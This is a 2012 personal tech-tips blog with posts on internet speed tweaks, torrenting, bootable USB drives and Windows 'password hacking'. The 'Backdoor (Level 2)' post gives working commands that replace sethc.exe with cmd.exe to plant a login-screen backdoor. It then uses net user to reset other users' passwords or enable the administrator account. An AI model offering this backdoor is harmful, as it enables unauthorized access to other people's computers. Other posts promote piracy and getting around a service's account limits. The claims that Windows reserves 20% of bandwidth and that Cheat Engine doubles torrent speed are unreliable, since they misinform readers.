Thursday, 8 November 2012

Optimize Your Internet Speed - TCP optimizer

TCP optimizer optimizes your tcp/ip protocols allowing better download/upload.
 You can download it here.

1- Run the downloaded file in Administer mode ie. "Run As Administer". This is compulsory.
2- Goto "MTU/Latency" tab.



3- Click on "Largest MTU" and see the data in "You can set your MTU to ***".
   In my case its 1500, could be the same as yours..



4- Then go to the "General settings" tab again. Click on "Custom" in the bottom right corner and set your MTU value to 1500.
  Please note, it could already be set to 1500. You could also change your connection speed to the one you have.



5- Then click on "Apply changes" --> ok.
  It would ask you to reboot , which is necessary. After the reboot your connections will be optimized.
  Cheers!



Sunday, 4 November 2012

Double Your Torrent Download Speed - Cheat Engine

Cheat Engine is famous for increasing the torrent download speed to almost double..! My download speed increased to 1.6 mBps from 800 kBps.. so it works..

First, Download Cheat Engine 6.1 (You need utorrent to download it)

 After downloading Cheat Engine install it.. Then run it...!

1) Click on the "small computer sign" as shown in picture below.



2) Then you will get a small window as shown below.
     Here, find utorrent or bittorrent (in my case it is bittorrent) and click on "attach debugger  to process".



3) Then click on the checkbox named "enable speedhack" and change the vaule from "1" to "0.5" . And click on appy..!



 There! You're done.. Check your download speed..! You have to do it everytime you run utorrent, and   cheat engine is not running like this..
cheers...

Thursday, 1 November 2012

Download Torrents Using Internet Download Managers (Direct Links)

Sometimes your ISP may block the torrent websites (such as Torrentz , Piratebay , Ahashare ) or the entire p2p network (peering-to-peering network) that enables us to download torrents via utorrent .

                               Go to www.zbigz.com

 This a Website named zbigz that downloads the specified torrent and gives you a direct link to download. You just have to create an account which is FREE.. Don't get over-excited please, the free account has some limits such as -
               1. You can keep only 2 torrents in your list to download in the site.
               2. You cant download a file that's more than 8 GB..

So , just make multiple free accounts in multiple email id's to get many torrents. And download Game Repacks cause honestly what will you download that's more than 8 GB and not a game..
  Cheers! Don't forget to share this post if you like it...!

                                  <<Share On Facebook>>

                                                        

Sunday, 30 September 2012

Increase Internet Speed (Part 1)


This is a famous tweak to increase your internet speed in windows 7, haven't tried in windows xp or 8 but it should be the same.
When you activate your internet connection windows "reserves" some bandwidth for itself; 'some' meaning 20%...!

All you have to do it get that fuck back!
               
               Here's how (P.S its not a 'hack'):

1) First Go to start search (i.e click on start) and type 'gpedit.msc'



2) Press enter or double click ,whatever, just run it.



3) Then Go to Computer Configuration and double click it.
4) then keep opening the tabs as per i say,
             Administrative templates --> Network --> QoS Packet Scheduler --> Limit Reservable Bandwidth
5) When you open the 'Limit Reservable Bandwidth' option it will look like this ;



6) on the left top corner the checkbox will be on 'Not configured'..! Even if it isnt , dont get nervous !


         

  •     Just Click on Enabled, and change the "bandwidth limit (%)" to '0'.. Then Click apply -> ok.


7) Restart your computer!

   Note: This tweak should increase your surfing speed to about 20% or so. But since internet speed isn't really 'Constant' ,its hard to tell.

         Theorytically this works! You have to do it and see for yourself....

                                  << Share This Post On Facebook >>

Saturday, 29 September 2012

Hacking Windows Password - Backdoor (Level 2)

Before learning this hack you have to read the previous "level 1" hacking post I've written, to know about the "net user" command in windows. To see the post click here .If you know that then Fuck it..
   
   This hack opens a backdoor in your windows, using which you can log on anytime replacing/ignoring the current user account password. But like last time, You have to get physical access (only once if you pull it off) to the account. You can use it to login if you forgot your password.
     
    How to:

1. Open 'cmd.exe' in administrator mode. (ignore the 's)
2. type 'takeown /f sethc.exe' (this command will take ownership of the sethc.exe file)
3. type 'icacls "c:\windows\system32\sethc.exe" /grant administrators:F'
4. type 'ren sethc.exe sethc_old.exe' (this will rename the sticky keys program)

-----> if you get a "access denied" notification you need to manually get the ownership. -----> to manually get the ownership go to the file (C: -> windows -> system32 -> sethc.exe -> right click -> properties -> click on the security tab -> edit -> click on user and click on the full control checkbox ) -> apply -> ok
     
 5. type 'copy cmd.exe sethc.exe' (this will copy paste the cmd.exe file and name it sethc.exe)



Its done! now if you press "shift key" 5 time you will see the command prompt opening! this is the backdoor!

Now you can log in to windows by either replacing a password of an account or creating another account or logging in to the administrator account using this command window. select any of the processes below:

 1) 'net user user_acc new_password' to change the password of the user_acc to new_password.
 (ie: 'net user john abc123' ; if you wanna get into the account name john!)

 2) type 'net user new_user /add' to add an account and log in there.

 3) type 'net user administrator /active:yes' to enable the administrator account and logging in to it!
    (you might need to restart)

                                                 <<  Share On Facebook >>

If you like my posts Subscribe by clicking "subscribe" at the right side! Leave a comment if you have any queries!

                   


 


Sunday, 23 September 2012

Hack and Replace Windows Password (Level 1)

The "net user" command is used to replace Windows password even when you donot know the original password.

But to do that you have to get access to the user account first, which is not a "hack" in my book!

however, it does help in hacking without getting access to any user account in windows, which i will post later!

How To: 


  1. first type "cmd" (without the quotes "") in the start panel of windows, and right click it. then click "Run as administrator".



2. when the command prompt open type "net user". you will see a list of accounts in it.



3. then type "net user account_name new_password"

Remember:

  • Give spaces in between each words

  • account_name is the name of the account you want to change the password of

  • new_password is obviously the new password you are changing to in the user account_name

for example if you type "net user john abc123"  the password for the user "john" will be replaced to "abc123".

cheers!

also if you type

  • "net user rahul /add" it will add a username account named rahul

  •  "net user rahul abc123" it will add a username rahul with a password "abc123"

  • "net user rahul /del" it will delete the account rahul!

for a video tutorial : Click Here

                                               <<  Share On Facebook >>

Saturday, 22 September 2012

Make A Windows Bootable Usb

1) First you need to type some codes in the command prompt of ANY windows 8 or 7 or xp. Enter your usb and the dvd (if you have an image file, mount it to your virtual drive using daemon tools.)



Here are the ways:

  • Go to Start, type cmd. Right click and click "Run as administrator".



Click yes, and it will open the command prompt

  • type "diskpart" (without the quotes "" )!!!

  • then type "list disk" (the list disk command will list all the disks in you have)

  • type "select disk #" (# is the disk no of the usb you have plugged in, you can get the number by checking your disk size. Mine's 0 for example)



  • then type "clean" ( it will clean the usb , but will not format it, so if you leave it like this , your usb wont work afterwise until you do the following command or format it)

  • type "create partition primary" (it will create the partition)

  • type "select partition 1"

  • type "active"

  • type "format fs=ntfs quick" (you can change the "ntfs" to any format you like, for eg "fat32". Quick is for quick format.)

  • type "exit"! cause its done!

  • then Copy the Windows files INSIDE the dvd to the pen drive.

(REMEMBER, don't copy the drive, but the files inside, otherwise it wont work!)

- Now, just in case you have to copy the boot sector (though you might not need it, so you can skip this step if you want to experiment and want to take a little risk. I did not need this step.)

2) In the command prompt window type the following (type after the ">" since its already written, for example "g:" in the 1st step):

replace "e" with your Usb's drive letter. In the picture above its e.

replace "G" with your dvd/virtual dive letter. see the above picture.

  • C:\Windows\system32>g:

  • G:\>cd boot

  • G:\boot>bootsect /nt60 e:

Target volumes will be updated with BOOTMGR compatible bootcode.
Bootcode was successfully updated on all targeted volumes.

  • G:\boot>exit

Now you have a working bootable usb!
                                           << Share On Facebook >>